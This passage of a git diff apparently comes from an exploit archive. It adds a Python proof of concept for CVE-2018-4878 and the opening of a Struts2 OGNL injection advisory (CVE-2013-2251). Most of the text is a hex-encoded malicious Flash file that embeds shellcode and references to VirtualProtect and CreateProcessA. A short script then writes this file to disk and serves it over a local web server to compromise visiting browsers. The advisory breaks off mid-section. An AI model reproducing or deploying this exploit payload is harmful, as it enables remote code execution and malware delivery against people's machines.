D\x02\x66\x02\x66\x30\x61\x2F\x5E\x31\x5D\x02\x66\x02\x66\x32\x46\x06\x00\x2C\x50\x46\x07\x01\x24\x00\xB0\x61\x31\xEF\x01\x10\x05\x0E\x5E\x33\x5D\x02\x66\x02\x66\x32\x46\x06\x00\x2C\x51\x46\x07\x01\x24\x00\xB0\x61\x33\x47\x00\x00\x01\x09\x02\x03\x04\x37\xD0\x30\xD1\x25\x80\x20\xAD\x76\x2A\x76\x12\x04\x00\x00\x10\x06\x00\x00\x29\xD1\x2F\x01\xB0\x76\x12\x0A\x00\x00\xF0\x1B\x5D\x3E\x2C\x4C\x4A\x3E\x01\x03\x5D\x39\x66\x39\xD1\x61\x3F\xF0\x1E\x5D\x39\x66\x39\x46\x42\x00\x48\x00\x00\x02\x09\x03\x03\x04\x37\xD0\x30\xD1\x25\x80\x20\xAD\x76\x2A\x76\x12\x04\x00\x00\x10\x06\x00\x00\x29\xD1\x2F\x01\xB0\x76\x12\x0A\x00\x00\xF0\x27\x5D\x3E\x2C\x4C\x4A\x3E\x01\x03\x5D\x39\x66\x39\xD1\x61\x3F\x5D\x39\x66\x39\xD2\x46\x40\x01\x29\x47\x00\x00\x03\x09\x02\x03\x04\x14\xD0\x30\x5D\x39\x66\x39\xD1\x61\x3A\x5D\x3B\x66\x3B\x66\x3C\x82\x24\x01\xA1\x48\x00\x00\x04\x0A\x03\x03\x04\x74\xD0\x30\x5D\x37\xD1\x46\x37\x01\x24\x18\x82\xA0\x74\xD6\xF0\x38\x5D\x41\xD2\x46\x41\x01\x74\xD6\x5D\x44\x66\x44\x96\x11\x10\x00\x00\x10\x48\x00\x00\x09\x5E\x44\x5D\x44\x66\x44\x24\x04\xA0\x61\x44\x5D\x44\x66\x44\x24\x32\xAD\x76\x2A\x76\x12\x14\x00\x00\x29\x5D\x41\xD2\x5D\x44\x66\x44\xA0\x46\x41\x01\xD1\x24\x00\x66\x45\xAB\x96\x76\x11\xCE\xFF\xFF\xF0\x3F\x5D\x44\x66\x44\x24\x32\x0F\x0A\x00\x00\xF0\x41\x5D\x3E\x2C\x4C\x4A\x3E\x01\x03\xD2\x5D\x44\x66\x44\xA0\x48\x00\x00\x05\x0A\x05\x04\x09\xA3\x01\xD0\x30
\x57\x2A\xD7\x30\xEF\x01\x26\x02\x48\x65\x01\xD1\x6D\x01\x65\x01\xD2\x6D\x02\x65\x01\x24\x00\x74\x6D\x03\x65\x01\x24\x00\x74\x6D\x04\xF0\x4C\x65\x01\x65\x01\x6C\x01\x80\x47\x6D\x05\x5E\x39\x65\x01\x6C\x05\x61\x39\xF0\x52\x65\x01\x65\x01\x6C\x05\x66\x4A\x74\x6D\x03\xF0\x53\x5E\x3B\x65\x01\x6C\x02\x61\x3B\x65\x01\x6C\x03\x2F\x02\x13\x08\x00\x00\x5D\x3E\x2C\x4C\x4A\x3E\x01\x03\xF0\x58\x5D\x31\x66\x31\x11\x04\x00\x00\x10\x0E\x00\x00\xF0\x5B\x5D\x4B\x66\x4B\x46\x4C\x00\x29\x10\x0A\x00\x00\xF0\x5F\x5D\x3E\x2C\x4C\x4A\x3E\x01\x03\xF0\x62\x47\xF0\x64\x10\x11\x00\x00\xD0\x30\xD3\x30\x5A\x00\x2A\x63\x04\x2A\x30\x2B\x6D\x01\xF0\x67\x47\xF0\x69\x47\x01\x2F\x89\x01\x8F\x01\x3E\x49\x05\x1D\x00\x01\x18\x00\x1E\x00\x02\x1F\x00\x20\x00\x03\x0D\x00\x21\x00\x04\x0D\x00\x22\x00\x05\x18\x00\x06\x0A\x02\x03\x04\x01\x47\x00\x00\x07\x08\x01\x04\x05\x0E\xF1\x12\xF0\x11\xD0\x30\xF0\x13\xD0\x49\x00\xF0\x14\x47\x00\x00\x08\x09\x01\x01\x03\x36\x10\x06\x00\x00\x41\x06\x44\x0B\x06\x03\xD0\x30\xF1\x12\xF0\x06\x5D\x2B\x10\x04\x00\x00\x1A\x1B\x00\x00\x5D\x13\x66\x13\x30\x5D\x13\x66\x13\x58\x00\x1D\x68\x2A\xF1\x12\x10\x05\x00\x00\xD7\x4A\x09\x0C\xD4\xF0\x04\x47\x00\x00\xBF\x14\xF8\x00\x00\x00\x01\x00\x00\x00\x6D\x78\x2F\x63\x6F\x72\x65\x2F\x6D\x78\x5F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x00\x10\x00\x2E\x00\x00\x00\x00\x0A\x43\x45\x3A\x5C\x64\x65\x76\x5C\x34\x2E\x79\x5C\x66\x72\x61\x6D\x65\x77\x6F\x72\x6B\x73\x5C\x70\x72\x6F\x6A\x65\x63\x74\x73\x5C\x66\x72\x61\x6D\x65\x77\x6F\x72\x6B\x5C\x73\x72\x63\x3B\x6D\x78\x5C\x63\x6F\x72\x65\x3B\x6D\x78\x5F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x61\x73\x00\x07\x6D\x78\x2E\x63\x6F\x72\x65\x0B\x6D\x78\x5F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2A\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x32\x30\x30\x36\x2F\x66\x6C\x65\x78\x2F\x6D\x78\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x00\x06\x6E\x61\x6D\x65\x5F\x31\x06\x6E\x61\x6D\x65\x5F\x32\x06\x6E\x61\x6D\x65\x5F\x37\x04\x16\x03\x08\x05\x16\x06\x00\x05\x07\x01\x04\x07\x03\x07\x07\x03\x08\x07\x03
\x09\x01\x00\x00\x02\x00\x00\x00\x01\x00\x01\x01\x06\x00\x00\x02\x08\x01\x00\x08\x01\x01\x02\x10\xD0\x10\x05\x00\x00\x40\x06\x41\x06\x03\x30\xF1\x01\xF0\x0C\x47\x00\x00\xBF\x14\x42\x0D\x00\x00\x01\x00\x00\x00\x67\x61\x64\x67\x65\x74\x00\x10\x00\x2E\x00\x05\x00\x80\x80\x80\x04\xFF\xFF\x03\x80\x80\x04\x00\x02\x00\x00\x00\x00\xE0\xFF\xEF\x41\x79\x06\x67\x61\x64\x67\x65\x74\x07\x50\x72\x69\x6D\x69\x74\x31\x02\x1E\x18\x00\x3B\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x4D\x69\x68\x61\x5C\x41\x64\x6F\x62\x65\x4D\x69\x6E\x65\x50\x6F\x43\x5F\x74\x72\x79\x69\x6E\x67\x54\x6F\x45\x76\x61\x64\x65\x53\x65\x63\x53\x6F\x6C\x75\x74\x69\x6F\x6E\x73\x66\x6C\x61\x36\x2E\x61\x73\x06\x70\x61\x72\x61\x6D\x31\x04\x72\x65\x73\x74\x10\x67\x61\x64\x67\x65\x74\x2F\x66\x6C\x61\x73\x68\x31\x30\x30\x30\x04\x75\x69\x6E\x74\x09\x67\x61\x64\x67\x65\x74\x30\x24\x30\x07\x66\x6C\x61\x73\x68\x33\x32\x07\x66\x6C\x61\x73\x68\x33\x35\x07\x66\x6C\x61\x73\x68\x32\x31\x05\x45\x72\x72\x6F\x72\x08\x70\x6F\x73\x69\x74\x69\x6F\x6E\x0C\x72\x65\x61\x64\x55\x54\x46\x42\x79\x74\x65\x73\x0B\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65\x21\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x41\x53\x33\x2F\x32\x30\x30\x36\x2F\x62\x75\x69\x6C\x74\x69\x6E\x01\x6B\x00\x01\x6E\x01\x65\x00\x00\x01\x6C\x07\x72\x65\x61\x64\x55\x54\x46\x01\x76\x00\x01\x75\x00\x01\x70\x00\x01\x74\x00\x01\x63\x01\x72\x00\x00\x00\x00\x01\x73\x00\x02\x62\x30\x01\x62\x06\x76\x61\x72\x5F\x31\x32\x04\x73\x69\x7A\x65\x03\x6F\x66\x74\x02\x66\x74\x07\x67\x61\x64\x67\x65\x74\x33\x03\x69\x6E\x74\x0E\x67\x61\x64\x67\x65\x74\x2F\x67\x61\x64\x67\x65\x74\x30\x06\x70\x61\x72\x61\x6D\x32\x06\x70\x61\x72\x61\x6D\x33\x07\x5F\x6C\x6F\x63\x31\x30\x5F\x06\x5F\x6C\x6F\x63\x34\x5F\x06\x5F\x6C\x6F\x63\x35\x5F\x06\x5F\x6C\x6F\x63\x36\x5F\x06\x5F\x6C\x6F\x63\x37\x5F\x06\x5F\x6C\x6F\x63\x38\x5F\x06\x5F\x6C\x6F\x63\x39\x5F\x07\x5F\x6C\x6F\x63\x31\x31\x5F\x07\x5F\x6C\x6F\x63\x31\x32\x5F\x09\x66\x6C\x61\x73\x68\x31\x30\x30\x30\x07\x66\x6C\x61\x73\x68\x37\x30\x06\x56
\x65\x63\x74\x6F\x72\x0C\x67\x61\x64\x67\x65\x74\x2E\x61\x73\x24\x31\x35\x06\x50\x72\x69\x6D\x69\x74\x0B\x5F\x5F\x41\x53\x33\x5F\x5F\x2E\x76\x65\x63\x07\x66\x6C\x61\x73\x68\x33\x34\x07\x66\x6C\x61\x73\x68\x33\x36\x05\x41\x72\x72\x61\x79\x04\x63\x61\x6C\x6C\x05\x61\x70\x70\x6C\x79\x0E\x67\x61\x64\x67\x65\x74\x2F\x67\x61\x64\x67\x65\x74\x31\x09\x66\x6C\x61\x73\x68\x32\x30\x24\x31\x09\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x07\x4D\x61\x69\x6E\x45\x78\x70\x06\x64\x61\x74\x61\x31\x34\x0F\x72\x65\x61\x64\x55\x6E\x73\x69\x67\x6E\x65\x64\x49\x6E\x74\x04\x70\x75\x73\x68\x06\x6C\x65\x6E\x67\x74\x68\x08\x6D\x65\x74\x68\x6F\x64\x5F\x34\x08\x6D\x65\x74\x68\x6F\x64\x5F\x35\x09\x66\x6C\x61\x73\x68\x32\x30\x30\x33\x09\x66\x6C\x61\x73\x68\x32\x30\x30\x35\x07\x67\x61\x64\x67\x65\x74\x34\x07\x67\x61\x64\x67\x65\x74\x37\x07\x67\x61\x64\x67\x65\x74\x38\x07\x67\x61\x64\x67\x65\x74\x39\x03\x72\x65\x73\x09\x66\x6C\x61\x73\x68\x32\x30\x30\x34\x06\x53\x74\x72\x69\x6E\x67\x0E\x67\x61\x64\x67\x65\x74\x2F\x66\x6C\x61\x73\x68\x32\x30\x0D\x67\x61\x64\x67\x65\x74\x2F\x67\x61\x64\x67\x65\x74\x17\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x70\x6F\x73\x03\x31\x34\x35\x03\x31\x37\x37\x03\x32\x39\x32\x03\x33\x38\x32\x04\x33\x32\x31\x32\x07\x66\x6C\x61\x73\x68\x32\x30\x04\x34\x34\x31\x34\x06\x4F\x62\x6A\x65\x63\x74\x1C\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x63\x74\x6F\x72\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x32\x31\x35\x02\x39\x33\x00\x06\x6E\x61\x6D\x65\x5F\x31\x06\x6E\x61\x6D\x65\x5F\x32\x06\x6E\x61\x6D\x65\x5F\x37\x02\x63\x72\x02\x6E\x65\x0C\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x0E\x76\x69\x72\x74\x75\x61\x6C\x70\x72\x6F\x74\x65\x63\x74\x0E\x63\x72\x65\x61\x74\x65\x70\x72\x6F\x63\x65\x73\x73\x61\x08\x6D\x65\x74\x68\x6F\x64\x5F\x32\x08\x6D\x65\x74\x68\x6F\x64\x5F\x32\x11\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x46\x75\x6E\x63\x08\x66\x69\x6E\x64\x66\x75\x6E\x63\x3A\x05\x01\x16\x04\x17\x04\x08\x12\x05\x42
\x18\x01\x1A\x01\x1A\x43\x16\x44\x16\x6C\x16\x6C\x17\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x16\x6C\x06\x09\x01\x02\x03\x04\x05\x06\x07\x08\x09\x08\x01\x02\x03\x04\x05\x06\x07\x08\x01\x03\x09\x01\x0A\x0C\x04\x05\x06\x07\x08\x09\x08\x01\x0A\x0C\x04\x05\x06\x07\x08\x67\x07\x02\x09\x07\x03\x0B\x07\x03\x0C\x07\x03\x0D\x07\x02\x0E\x07\x03\x75\x07\x02\x0F\x07\x02\x10\x07\x04\x11\x07\x02\x1A\x07\x03\x02\x07\x02\x16\x07\x03\x2B\x07\x03\x2C\x07\x03\x2D\x07\x03\x2E\x07\x03\x2F\x07\x03\x30\x07\x03\x31\x07\x03\x23\x07\x02\x32\x07\x03\x3F\x07\x02\x40\x09\x41\x01\x07\x09\x41\x1D\x19\x01\x01\x1B\x02\x07\x03\x45\x07\x03\x46\x07\x02\x47\x07\x04\x48\x07\x04\x49\x07\x02\x4C\x07\x02\x4D\x07\x02\x4E\x07\x02\x4F\x07\x04\x50\x07\x02\x51\x07\x03\x52\x07\x03\x53\x07\x03\x54\x07\x03\x29\x07\x03\x55\x07\x03\x56\x07\x03\x57\x07\x03\x58\x07\x03\x59\x07\x03\x5A\x07\x03\x5B\x07\x02\x5C\x07\x03\x66\x07\x03\x01\x07\x02\x43\x09\x01\x03\x07\x02\x68\x07\x0A\x6D\x07\x0A\x6E\x07\x0A\x6F\x07\x0C\x66\x07\x0A\x0E\x07\x0A\x16\x07\x0A\x47\x07\x0A\x4C\x07\x0A\x09\x1D\x19\x01\x40\x07\x0A\x4D\x07\x0A\x4E\x07\x0A\x0F\x07\x0A\x4F\x07\x0A\x51\x09\x41\x04\x1D\x19\x01\x40\x07\x0C\x46\x07\x0C\x52\x07\x0C\x53\x07\x0C\x0C\x07\x0C\x3F\x07\x0C\x0B\x07\x0C\x45\x07\x0C\x02\x07\x0A\x40\x1D\x19\x01\x40\x1B\x05\x07\x0A\x1A\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x0C\x0D\x07\x0C\x76\x07\x0A\x10\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x0C\x77\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x0C\x78\x1D\x19\x01\x40\x1D\x19\x01\x40\x07\x00\x00\x04\x00\x01\x00\x40\x08\x8C\x01\x01\x03\x06\x00\x40\x33\x02\x03\x00\x40\x40\x40\x4A\x80\x06\x34\x35\x00\x00\x5D\x02\x00
\x00\x5E\x00\x00\x00\x04\x00\x08\x5F\x01\x60\x61\x5F\x01\x60\x62\x5F\x01\x60\x63\x5F\x01\x60\x64\x5F\x01\x60\x65\x5F\x01\x60\x67\x69\x01\x60\x6A\x5F\x01\x60\x6B\x01\x34\x35\x09\x06\x00\x05\x00\x00\x06\x5F\x40\x01\x40\x00\x01\x00\x06\x40\x02\x01\x00\x01\x01\x4D\x51\x03\x01\x01\x02\x64\x51\x04\x02\x01\x03\x4B\x51\x05\x03\x01\x04\x3B\x51\x06\x04\x01\x05\x01\x06\x01\x34\x44\x00\x00\x02\x06\x07\x07\x00\x08\x01\x04\x05\x0D\xD0\x30\xEF\x01\x02\x00\x09\xEF\x01\x03\x01\x0A\x47\x00\x00\x01\x08\x03\x04\x05\x01\x47\x00\x00\x02\x0C\x03\x05\x0A\xA4\x06\xD0\x30\x57\x2A\xD5\x30\x65\x01\x24\x00\x74\x6D\x01\x65\x01\x24\x00\x74\x6D\x02\xF0\x19\x65\x01\x24\x00\x74\x6D\x03\x65\x01\x24\x00\x74\x6D\x04\xF0\x1B\x65\x01\x24\x00\x74\x6D\x05\xF0\x1C\x65\x01\x24\x00\x74\x6D\x06\x65\x01\x24\x00\x74\x6D\x07\xF0\x1E\x65\x01\x24\x00\x73\x6D\x08\x65\x01\x5D\x4E\x5D\x4C\x5D\x57\x66\x57\x46\x4C\x01\x46\x4E\x01\x2F\x01\xA8\x74\x6D\x01\x65\x01\x65\x01\x6C\x01\x2D\x02\xA1\x74\x6D\x02\x10\x3B\x00\x00\x09\xF0\x26\x5D\x4E\x65\x01\x6C\x02\x46\x4E\x01\x2D\x03\xA8\x25\xCD\xB4\x01\x14\x0D\x00\x00\xF0\x28\x65\x01\x24\x00\x74\x6D\x01\x10\x22\x00\x00\x65\x01\x6C\x03\x91\x74\x65\x01\x2B\x6D\x03\x65\x01\x65\x01\x6C\x02\x2D\x04\xA1\x74\x6D\x02\x65\x01\x6C\x03\x25\x80\x04\x15\xBA\xFF\xFF\x65\x01\x6C\x01\x76\x11\x04\x00\x00\x10\x0A\x00\x00\xF0\x30\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\x32\x5E\x58\x65\x01\x6C\x02\x61\x58\xF0\x33\x65\x01\x65\x01\x6C\x02\x5D\x4E\x65\x01\x6C\x02\x24\x3C\xA0\x46\x4E\x01\xA0\x74\x6D\x01\x5D\x4E\x65\x01\x6C\x01\x46\x4E\x01\x25\xD0\x8A\x01\x14\x04\x00\x00\x10\x0A\x00\x00\xF0\x36\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x65\x01\x5D\x4E\x65\x01\x6C\x01\x25\x84\x01\xA0\x46\x4E\x01\x74\x6D\x04\xF0\x39\x65\x01\x65\x01\x6C\x02\x5D\x4E\x65\x01\x6C\x01\x25\x80\x01\xA0\x46\x4E\x01\xA0\x74\x6D\x01\x65\x01\x24\x03\x24\x04\xA2\x74\x6D\x03\x10\x70\x00\x00\x09\x5D\x57\x66\x57\x65\x01\x6C\x02\x5D\x4E\x65\x01\x6C\x01\x65\x01\x6C\x03\xA0\x46\x4E\x01\xA0\x61\x44\x5D\x57\x66\x57\x24\x0C\x46\x59\x01\x46\x09\x00\x2C\x72\x14
\x35\x00\x00\x65\x01\x5D\x4E\x65\x01\x6C\x01\x65\x01\x6C\x03\xA0\x24\x03\x24\x04\xA2\xA1\x46\x4E\x01\x74\x6D\x05\x65\x01\x5D\x4E\x65\x01\x6C\x01\x65\x01\x6C\x03\xA0\x24\x04\xA0\x46\x4E\x01\x74\x6D\x06\xF0\x42\x10\x1B\x00\x00\x65\x01\x65\x01\x6C\x03\x24\x05\x24\x04\xA2\xA0\x74\x6D\x03\x65\x01\x6C\x03\x65\x01\x6C\x04\x15\x84\xFF\xFF\x65\x01\x6C\x05\x24\x00\xAB\x76\x2A\x76\x11\x09\x00\x00\x29\x65\x01\x6C\x06\x24\x00\xAB\x76\x11\x04\x00\x00\x10\x0A\x00\x00\xF0\x48\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\x4A\x65\x01\x65\x01\x6C\x05\x65\x01\x6C\x02\xA0\x74\x6D\x05\xF0\x4B\x65\x01\x24\x00\x74\x6D\x03\x10\xE9\x00\x00\x09\xF0\x4E\x65\x01\x5D\x4E\x65\x01\x6C\x05\x46\x4E\x01\x74\x6D\x01\x65\x01\x6C\x01\x24\x00\x14\x0A\x00\x00\xF0\x51\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x5D\x57\x66\x57\x65\x01\x6C\x02\x65\x01\x6C\x01\xA0\x61\x44\x5D\x57\x66\x57\x46\x54\x00\x46\x09\x00\x2C\x73\x14\x38\x00\x00\xF0\x56\x65\x01\x5D\x4E\x65\x01\x6C\x02\x65\x01\x6C\x06\xA0\x65\x01\x6C\x03\x24\x04\xA2\xA0\x46\x4E\x01\x74\x6D\x07\xF0\x57\x65\x01\x6C\x08\xC0\x73\x65\x01\x2B\x6D\x08\x65\x01\x6C\x08\x24\x01\x0E\x58\x00\x00\x10\x7E\x00\x00\x5D\x57\x66\x57\x65\x01\x6C\x02\x65\x01\x6C\x01\xA0\x61\x44\x5D\x57\x66\x57\x46\x54\x00\x46\x09\x00\x2C\x74\x13\x04\x00\x00\x10\x31\x00\x00\x5E\x5F\x5D\x4E\x65\x01\x6C\x02\x65\x01\x6C\x06\xA0\x65\x01\x6C\x03\x24\x04\xA2\xA0\x46\x4E\x01\x61\x5F\xF0\x63\x65\x01\x6C\x08\xC0\x73\x65\x01\x2B\x6D\x08\x65\x01\x6C\x08\x24\x01\x17\x2A\x00\x00\x65\x01\x6C\x03\x91\x74\x65\x01\x2B\x6D\x03\xF0\x6B\x65\x01\x65\x01\x6C\x05\x24\x04\xA0\x74\x6D\x05\xF0\x4C\x65\x01\x6C\x03\x25\x80\x02\x0C\x04\x00\x00\x10\x06\xFF\xFF\x65\x01\x6C\x07\x48\xF0\x6F\x10\x17\x00\x00\xD0\x30\xD1\x30\x5A\x00\x2A\xD6\x2A\x30\x2B\x6D\x01\xF0\x71\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x24\x00\x48\x01\x46\x84\x06\x8A\x06\x3C\x3D\x08\x0D\x00\x01\x01\x00\x0E\x00\x02\x01\x00\x0F\x00\x03\x01\x00\x10\x00\x04\x01\x00\x11\x00\x05\x01\x00\x12\x00\x06\x01\x00\x13\x00\x07\x01\x00\x14\x00\x08\x15\x00\x03\x0D\x0D\x04\x05\x86\x03\xD0\x30\x24\x00
\x74\x63\x04\x5D\x4D\x46\x4D\x00\x29\x5D\x4C\x5D\x4D\x66\x4D\x46\x4C\x01\x74\x63\x05\xF0\x7C\x5D\x4E\x5D\x4E\x5D\x4E\x62\x05\x24\x08\xA0\x46\x4E\x01\x24\x14\xA0\x46\x4E\x01\x24\x04\xA0\x46\x4E\x01\x5D\x51\x66\x51\x96\x96\x12\x08\x00\x00\x25\xBC\x01\x82\x10\x04\x00\x00\x25\xB0\x01\x82\xA0\x74\x63\x06\xF0\x7D\x5D\x4E\x62\x06\x46\x4E\x01\x2D\x04\x15\x04\x00\x00\x10\x0A\x00\x00\xF0\x7F\x62\x06\x24\x04\xA0\x74\x63\x06\xF0\x81\x01\x5D\x4E\x62\x06\x46\x4E\x01\x74\x63\x06\xF0\x82\x01\x5D\x4E\x62\x06\x46\x4E\x01\x74\x63\x07\xF0\x83\x01\x5D\x4E\x62\x05\x24\x1C\xA0\x46\x4E\x01\x74\x63\x08\xF0\x84\x01\x5D\x4E\x62\x05\x24\x20\xA0\x46\x4E\x01\x74\x63\x09\xF0\x85\x01\x5D\x47\x66\x47\x5D\x40\x66\x40\x53\x01\x25\x80\x02\x42\x01\x80\x5A\x63\x0A\x10\x24\x00\x00\x09\xF0\x88\x01\x62\x0A\x62\x04\x5D\x4E\x62\x07\x25\x80\x01\xA1\x62\x04\x24\x04\xA2\xA0\x46\x4E\x01\x61\x53\xF0\x89\x01\x62\x04\x91\x74\x63\x04\xF0\x86\x01\x62\x04\x25\x80\x02\x0C\x04\x00\x00\x10\xCC\xFF\xFF\xF0\x8B\x01\x62\x0A\x24\x20\x24\x07\xA0\xD1\x61\x53\xF0\x8C\x01\x5D\x4F\x62\x05\x24\x1C\xA0\xD2\x46\x4F\x02\x29\xF0\x8D\x01\x5D\x4F\x62\x05\x24\x20\xA0\xD3\x46\x4F\x02\x29\xF0\x8E\x01\x5D\x4F\x62\x06\x5D\x49\x62\x0A\x46\x49\x01\x25\x80\x01\xA0\x46\x4F\x02\x29\xF0\x8F\x01\x5D\x3E\x24\x41\x4A\x3E\x01\x80\x3E\x63\x0B\xF0\x90\x01\x5D\x4D\x66\x4D\x66\x1F\x20\x62\x0B\x46\x20\x02\x82\x63\x0C\xF0\x91\x01\x5D\x4F\x62\x06\x62\x07\x46\x4F\x02\x29\xF0\x92\x01\x5D\x4F\x62\x05\x24\x1C\xA0\x62\x08\x46\x4F\x02\x29\xF0\x93\x01\x5D\x4F\x62\x05\x24\x20\xA0\x62\x09\x46\x4F\x02\x29\xF0\x94\x01\x47\x00\x00\x04\x0C\x03\x05\x0A\x92\x03\xD0\x30\x57\x2A\xD5\x30\x65\x01\x24\x00\x6D\x02\xF0\x98\x01\x65\x01\x20\x80\x3E\x6D\x01\xF0\x99\x01\x65\x01\x20\x80\x65\x6D\x03\xF0\x9F\x01\x65\x01\x5D\x3F\x66\x3F\x82\x6D\x08\xF0\xA0\x01\x65\x01\x20\x85\x6D\x09\xF0\xA4\x01\xF0\xA4\x01\x65\x01\x56\x00\x80\x3E\x6D\x01\xF0\xA5\x01\x5D\x42\x66\x42\x66\x43\x24\x00\x61\x44\xF0\xA6\x01\x65\x01\x24\x00\x73\x6D\x02\x10\x24\x00\x00\x09\xF0\xA7\x01\x65\x01\x6C\x01\x5D\x42\x66
\x42\x66\x43\x46\x45\x00\x46\x25\x01\x29\xF0\xA6\x01\x65\x01\x65\x01\x6C\x02\x24\x04\xA0\x73\x6D\x02\x65\x01\x6C\x02\x5D\x42\x66\x42\x66\x43\x66\x46\x15\xCC\xFF\xFF\xF0\xA8\x01\x65\x01\x5D\x47\x66\x47\x5D\x40\x66\x40\x53\x01\x64\x65\x01\x6C\x01\x41\x01\x80\x66\x6D\x03\xF0\xAA\x01\x65\x01\x5D\x49\x65\x01\x6C\x03\x46\x49\x01\x74\x6D\x04\xF0\xAC\x01\x65\x01\x5D\x64\x46\x64\x00\x74\x6D\x05\xF0\xAD\x01\x65\x01\x6C\x05\x24\x00\x13\x04\x00\x00\x10\x0B\x00\x00\xF0\xAF\x01\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x5D\x4B\x65\x01\x6C\x05\x65\x01\x6C\x04\x65\x01\x6C\x03\x66\x46\x24\x04\xA2\x46\x4B\x03\x29\x65\x01\x5D\x4C\x5D\x4D\x66\x4D\x46\x4C\x01\x74\x6D\x06\xF0\xB4\x01\x65\x01\x5D\x4E\x5D\x4E\x65\x01\x6C\x06\x24\x1C\xA0\x46\x4E\x01\x24\x08\xA0\x46\x4E\x01\x24\x04\xA0\x74\x6D\x06\xF0\xB5\x01\x65\x01\x5D\x4E\x65\x01\x6C\x06\x46\x4E\x01\x74\x6D\x07\xF0\xB6\x01\x5D\x4F\x65\x01\x6C\x06\x65\x01\x6C\x04\x46\x4F\x02\x29\xF0\xB8\x01\x65\x01\x5D\x4D\x66\x4D\x20\x5D\x5F\x66\x5F\x46\x1F\x02\x82\x6D\x08\xF0\xBA\x01\x5D\x4F\x65\x01\x6C\x06\x65\x01\x6C\x07\x46\x4F\x02\x29\x47\x10\x18\x00\x00\xD0\x30\xD1\x30\x5A\x00\x2A\xD6\x2A\x30\x2B\x6D\x01\xF0\xBF\x01\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\xC2\x01\x47\x01\x35\xF2\x02\xF6\x02\x3C\x3D\x09\x29\x00\x01\x1E\x00\x2A\x00\x02\x15\x00\x2B\x00\x03\x1A\x00\x2C\x00\x04\x01\x00\x2D\x00\x05\x01\x00\x2E\x00\x06\x01\x00\x2F\x00\x07\x01\x00\x30\x00\x08\x00\x00\x31\x00\x09\x32\x00\x05\x08\x01\x05\x06\x0E\xF1\x05\xF0\x0C\xD0\x30\xF0\x0E\xD0\x49\x00\xF0\x0F\x47\x00\x00\x06\x09\x01\x01\x04\x3D\xD0\x30\x10\x05\x00\x00\x41\x05\x03\x58\x04\xF1\x05\xF0\x07\x5D\x36\x5D\x37\x66\x37\x10\x04\x00\x00\x16\x1F\x00\x00\x30\x5D\x35\x66\x35\x30\x5D\x35\x66\x35\x58\x00\x1D\x26\x11\x06\x00\x00\x47\x70\x45\x0A\x10\xD5\x1D\x68\x34\xF1\x05\xF0\x05\x47\x00\x00\x1C\x13\x02\x00\x02\x00\x73\x68\x65\x6C\x6C\x63\x6F\x64\x42\x79\x74\x65\x73\x00\x00\x00\x4D\x61\x69\x6E\x45\x78\x70\x00\x40\x00\x00\x00" + + +print "[+] CVE-2018-4878 poc " +print "[x] files created" + +swf = "%s.swf" % flash_name 
+ +html = """ + + + +""" + "" + """ + +""" + +f = open("%s" % swf, "wb") +f.write(data) +f.close() + +f = open("index.html", "wb") +f.write(html) +f.close() + + +HandlerClass = SimpleHTTPRequestHandler +ServerClass = BaseHTTPServer.HTTPServer +Protocol = "HTTP/1.0" + + +port = 8080 +server_address = ('0.0.0.0', port) + +HandlerClass.protocol_version = Protocol +httpd = ServerClass(server_address, HandlerClass) + +sa = httpd.socket.getsockname() +print "Server ready", sa[0], "port", sa[1], "..." +httpd.serve_forever() \ No newline at end of file diff --git a/exploits/multiple/webapps/44583.txt b/exploits/multiple/webapps/44583.txt new file mode 100644 index 000000000..967940eec --- /dev/null +++ b/exploits/multiple/webapps/44583.txt 
@@ -0,0 +1,164 @@
+CVE Number: CVE-2013-2251
+Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
+Affected Software: Apache Struts v2.0.0 - 2.3.15
+Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
+Issue Status: v2.3.15.1 was released which fixes this vulnerability
+Issue ID by Vender: S2-016
+
+Overview:
+ Struts2 is an open-source web application framework for Java.
+ Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which
+ leads to arbitrary Java method execution on the target server. This is
+ caused by insecure handling of prefixed special parameters (action:,
+ redirect: and redirectAction:) in DefaultActionMapper class of Struts2.
+
+Details:
+
+
+ Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
